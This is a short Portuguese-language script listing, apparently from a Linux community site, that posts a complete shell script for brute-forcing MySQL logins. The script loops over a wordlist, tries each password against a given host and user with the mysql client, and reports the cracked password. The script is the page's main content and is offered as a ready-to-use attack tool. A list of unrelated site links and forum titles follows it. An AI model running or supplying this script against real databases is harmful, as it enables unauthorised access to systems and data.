MySQL brute-force
Publicado por Perfil removido (última atualização em 23/04/2013)
[ Hits: 6.049 ]
Script para fazer brute-force (através de word list) em MySQL.
#!/bin/sh # Coder: MMxM # Site: http://the-blackhats.blogspot.com function brute(){ clear echo -e "\n[+] Attacking: $1\n[*] User: $2\n" sleep 1 lines=$(wc -l $3 | awk '{print $1}') a=1 for i in `cat $3` do l=$(mysql -h $1 -u $2 -p"$i" -e "show databases;" 2> /dev/stdout) if [ "$?" == "0" ] then echo -ne "\r[*] Password Cracked [$a/$lines]: $i\n[+] Password: $i\n" break else echo -ne "\r[+] Trying [$a/$lines]: $i\r\r" fi a=$(($a+1)) done echo -ne "\n[+] 100% complete\n\n" } if [ $# != 3 ] then cat << _banner [+] ( Mysql Brute-force by MMxM ) [+] Usage: mysql.sh <host> <user> <wordlist> _banner exit fi which mysql > /dev/null if [ "$?" != "0" ] then echo "[-] ERROR MYSQL CLIENT NOT FOUND" exit fi brute $1 $2 $3
Configurando acesso ao MS SQL Server nativo e via ODBC no Debian GNU/Linux
Implementando a famosa hélice ASCII
tux-gpt - Assistente de IA para o Terminal
Instalação e configuração do Chrony
Programa IRPF - Guia de Instalação e Resolução de alguns Problemas
Como instalar no Linux Jogos da Steam só para Windows
Instalando o Team Viewer no Debian Trixie - problema no Policykit
O Que Fazer Após Instalar Ubuntu 25.04
Graduação e certificação Eng. de redes e Eng. Linux[DUVIDA] (0)
Controle do PS5 no Linux Mint funciona? (3)
Autenticação necessária. um aplicativo quer acesso ao chaveiro "c... (1)